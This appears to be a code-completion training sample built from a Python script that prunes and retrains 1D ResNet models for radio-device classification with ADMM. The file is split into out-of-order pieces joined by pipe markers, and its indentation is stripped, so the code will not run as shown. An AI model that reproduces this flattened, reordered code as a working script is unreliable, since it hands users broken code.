parser.add_argument('--normalize', default='True', type=str2bool, help='Specify if you want to normalize the data using mean and std in stats files (if stats does not have this info, it is ignored)')
parser.add_argument('--crop', default=0, type=int, help='if crop > 0 the generator crops the examples to a maximum length of crop')
parser.add_argument('--training_strategy', default='big', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--sampling', default='model', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--fir_size', default=11, type=int, help='FIR filter size.')
parser.add_argument('--use_preamble', default=False, type=str2bool, help='Using preamble to train channel-removing filter')
parser.add_argument('--merge_preamble', default=False, type=str2bool, help='Merge preamble with slice to train channel-removing filter')
parser.add_argument('--id_gpu', default=0, type=int, help='If --multigpu=False, this arguments specify which gpu to use.')
parser.add_argument('--test_stride', default=16, type=int, help='Specify the stride to use for testing')
parser.add_argument('--per_example_strategy', default='prob_sum', type=str, help='Specify the strategy used to compute the per wxample accuracy: (majority, prob_sum, log_prob_sum, all)')
################## augmentation parameters #####################
parser.add_argument('--aug_var', default='0.0434', type=float, help='variance of noise for data augmentation')
parser.add_argument('--aug_mean', default='0.045', type=float, help='mean of noise for data augmentation')
parser.add_argument('--aug_taps', default=11, type=int, help='Number of complex taps for data augmentation')
parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho)) | print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def masked_retrain(initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
elif args.combine_progressive:
print("progressive admm-train/re-train masking")
masks = {}
for name, W in (model.named_parameters()):
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# adjust learning rate
if args.admm:
admm.admm_adjust_learning_rate(optimizer, epoch, args)
else:
scheduler.step()
input=input.float()
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
if args.mixup:
input, target_a, target_b, lam = mixup_data(input, target, args.alpha)
# compute output
output = model(input)
if args.mixup:
ce_loss = mixup_criterion(criterion, output, target_a, target_b, lam, args.smooth)
else:
ce_loss = criterion(output, target, smooth=args.smooth)
if args.admm:
admm.z_u_update(args, ADMM, model, device, train_loader, optimizer, epoch, input, i, writer) # update Z and U variables
ce_loss, admm_loss, mixed_loss = admm.append_admm_loss(args, ADMM, model, ce_loss) # append admm losss
# measure accuracy and record loss
acc1,_ = accuracy(output, target, topk=(1,5))
losses.update(ce_loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
if args.admm:
mixed_loss.backward()
else:
ce_loss.backward()
if args.combine_progressive:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
if args.masked_retrain:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print(i)
if i % args.log_interval == 0:
for param_group in optimizer.param_groups:
current_lr = param_group['lr']
print('({0}) lr:[{1:.5f}] '
'Epoch: [{2}][{3}/{4}]\t'
'Status: admm-[{5}] retrain-[{6}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f}% ({top1.avg:.3f}%)\t'
.format(args.optmzr, current_lr,
epoch, i, len(train_loader), args.admm, args.masked_retrain, batch_time=data_time, loss=losses, top1=top1))
if i % 100 == 0:
idx_loss_dict[i] = losses.avg
return idx_loss_dict
def test(model, criterion, test_loader):
model.eval()
losses = AverageMeter()
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
output = model(data)
loss = criterion(output, target)
losses.update(loss.item(), data.size(0))
# test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
print('\nTest set loss: {:.4f}, * Acc@1: {}/{} ({:.2f}%)\n'.format(
losses.avg, correct, len(test_loader.dataset),
100. * float(correct) / float(len(test_loader.dataset))))
return losses.avg, (100. * float(correct) / float(len(test_loader.dataset)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def convert_secs2time(epoch_time):
need_hour = int(epoch_time / 3600)
need_mins = int((epoch_time - 3600*need_hour) / 60)
need_secs = int(epoch_time - 3600*need_hour - 60*need_mins)
return need_hour, need_mins, need_secs
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.3 ** (epoch // args.lr_decay))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
start_time = time.time()
main()
duration = time.time() - start_time
need_hour, need_mins, need_secs = convert_secs2time(duration)
print('total runtime: {:02d}:{:02d}:{:02d}'.format(need_hour, need_mins, need_secs)) | train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model) | random_line_split |
main.py | from __future__ import print_function
import os
import sys
import logging
import argparse
import time
from time import strftime
import torch
import torch.optim as optim
from torchvision import datasets, transforms
from models.resnet_1d import ResNet18_1d, ResNet34_1d, ResNet50_1d
import admm
from admm import GradualWarmupScheduler
from admm import CrossEntropyLossMaybeSmooth
from admm import mixup_data, mixup_criterion
from testers import *
from TrainValTest import TrainValTest
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def check_and_create(dir_path):
if os.path.exists(dir_path):
return True
else:
os.makedirs(dir_path)
return False
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 admm training')
parser.add_argument('--logger', action='store_true', default=True,
help='whether to use logger')
parser.add_argument('--arch', type=str, default=None,
help='[vgg, resnet, convnet, alexnet]')
parser.add_argument('--depth', default=None, type=int,
help='depth of the neural network, 16,19 for vgg; 18, 50 for resnet')
parser.add_argument('--s', type=float, default=0.0001,
help='scale sparse rate (default: 0.0001)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--multi-gpu', action='store_true', default=False,
help='for multi-gpu training')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 160)')
parser.add_argument('--admm-epochs', type=int, default=1, metavar='N',
help='number of interval epochs to update admm (default: 1)')
parser.add_argument('--optmzr', type=str, default='sgd', metavar='OPTMZR',
help='optimizer used (default: adam)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--lr-decay', type=int, default=30, metavar='LR_decay',
help='how many every epoch before lr drop (default: 30)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--load-model', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--load-mask', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--save-model', type=str, default="",
help='For Saving the current Model')
parser.add_argument('--masked-retrain', action='store_true', default=False,
help='for masked retrain')
parser.add_argument('--verbose', action='store_true', default=True,
help='whether to report admm convergence condition')
parser.add_argument('--admm', action='store_true', default=False,
help="for admm training")
parser.add_argument('--rho', type=float, default = 0.0001,
help ="define rho for ADMM")
parser.add_argument('--rho-num', type=int, default = 5,
help ="define how many rohs for ADMM training")
parser.add_argument('--sparsity-type', type=str, default='random-pattern',
help ="define sparsity_type: [irregular,column,filter,pattern,random-pattern]")
parser.add_argument('--config-file', type=str, default='config_vgg16',
help ="config file name")
parser.add_argument('--combine-progressive', default=False, type=str2bool,
help="for filter pruning after column pruning")
parser.add_argument('--purification', default=False, type=str2bool,
help="purification after pruning")
parser.add_argument('--lr-scheduler', type=str, default='default',
help='define lr scheduler')
parser.add_argument('--warmup', action='store_true', default=False,
help='warm-up scheduler')
parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='M',
help='warmup-lr, smaller than original lr')
parser.add_argument('--warmup-epochs', type=int, default=0, metavar='M',
help='number of epochs for lr warmup')
parser.add_argument('--mixup', action='store_true', default=False,
help='ce mixup')
parser.add_argument('--alpha', type=float, default=0.0, metavar='M',
help='for mixup training, lambda = Beta(alpha, alpha) distribution. Set to 0.0 to disable')
parser.add_argument('--smooth', action='store_true', default=False,
help='lable smooth')
parser.add_argument('--smooth-eps', type=float, default=0.0, metavar='M',
help='smoothing rate [0.0, 1.0], set to 0.0 to disable')
parser.add_argument('--no-tricks', action='store_true', default=False,
help='disable all training tricks and restore original classic training process')
########### From RFMLS: multi-gpu; batch-size
parser.add_argument('--exp_name', default='exp1', type=str, help='Specify the experiment name')
parser.add_argument('--base_path', default='/scratch/RFMLS/dataset100/dataset_with_val_9000train/', type=str, help='Specify the base path')
parser.add_argument('--save_path', default='/scratch/zhou.fan1/filtered/', type=str, help='Specify the save path')
parser.add_argument('--file_type', default='mat', type=str, help='Specify type of file you want to read')
parser.add_argument('--decimated', default=False, type=str2bool, help='Specify if the data in the files is decimated, if so and you are using the same stats file as the undecimated then the generator will take this into account')
parser.add_argument('--val_from_train', default=False, type=str2bool, help='If validation not present in partition file, generate one from the training set. (If false, use test set as validation)')
parser.add_argument('--test_on_val_set',default=False, type=str2bool, help='If true it will test the trained model on validation data, for tuning hyperparameters')
parser.add_argument('--train', default=False, type=str2bool, help='Specify doing training or not')
parser.add_argument('-ss', '--slice_size', default=1024, type=int, help='Specify the slice size')
parser.add_argument('-d', '--devices', default=100, type=int, help='Specify the number of total devices')
parser.add_argument('--cnn_stack', default=3, type=int, help='[Baseline Model] Specify the number of cnn layers')
parser.add_argument('--fc_stack', default=2, type=int, help='[Baseline Model] Specify the number of fc layers')
parser.add_argument('--channels', default=128, type=int, help='[Baseline Model] Specify the number of channels of cnn')
parser.add_argument('--fc1', default=256, type=int, help='[Baseline Model] Specify the number of neurons in the first fc layer')
parser.add_argument('--fc2', default=128, type=int, help='[Baseline Model] Specify the number of neurons in the penultimate fc layer')
# Data Generator
parser.add_argument('--generator', default='new', type=str, help='Specify which generator to use')
parser.add_argument('--add_padding', default=False, type=str2bool, help='If examples are smaller than slice size addpadding')
parser.add_argument('--padding_type', default='zero', type=str, help='"zero"-padding and "stride"-padding')
parser.add_argument('--try_concat', default=False, type=str2bool, help='If examples are smaller than slice size and using demodulated data, try and concat them')
parser.add_argument('--preprocessor', default='no', type=str, help='Specify which preprocessor to use')
parser.add_argument('--K', default=1, type=int, help='Specify the batch down sampling factor K')
parser.add_argument('-fpio', '--files_per_IO', default=500000, type = int, help='Specify the files loaded to memory per IO')
parser.add_argument('--shrink', default=1, type=float, help='Dataset down sampling factor')
parser.add_argument('--normalize', default='True', type=str2bool, help='Specify if you want to normalize the data using mean and std in stats files (if stats does not have this info, it is ignored)')
parser.add_argument('--crop', default=0, type=int, help='if crop > 0 the generator crops the examples to a maximum length of crop')
parser.add_argument('--training_strategy', default='big', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--sampling', default='model', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--fir_size', default=11, type=int, help='FIR filter size.')
parser.add_argument('--use_preamble', default=False, type=str2bool, help='Using preamble to train channel-removing filter')
parser.add_argument('--merge_preamble', default=False, type=str2bool, help='Merge preamble with slice to train channel-removing filter')
parser.add_argument('--id_gpu', default=0, type=int, help='If --multigpu=False, this arguments specify which gpu to use.')
parser.add_argument('--test_stride', default=16, type=int, help='Specify the stride to use for testing')
parser.add_argument('--per_example_strategy', default='prob_sum', type=str, help='Specify the strategy used to compute the per wxample accuracy: (majority, prob_sum, log_prob_sum, all)')
################## augmentation parameters #####################
parser.add_argument('--aug_var', default='0.0434', type=float, help='variance of noise for data augmentation')
parser.add_argument('--aug_mean', default='0.045', type=float, help='mean of noise for data augmentation')
parser.add_argument('--aug_taps', default=11, type=int, help='Number of complex taps for data augmentation')
parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho))
train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def | (initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
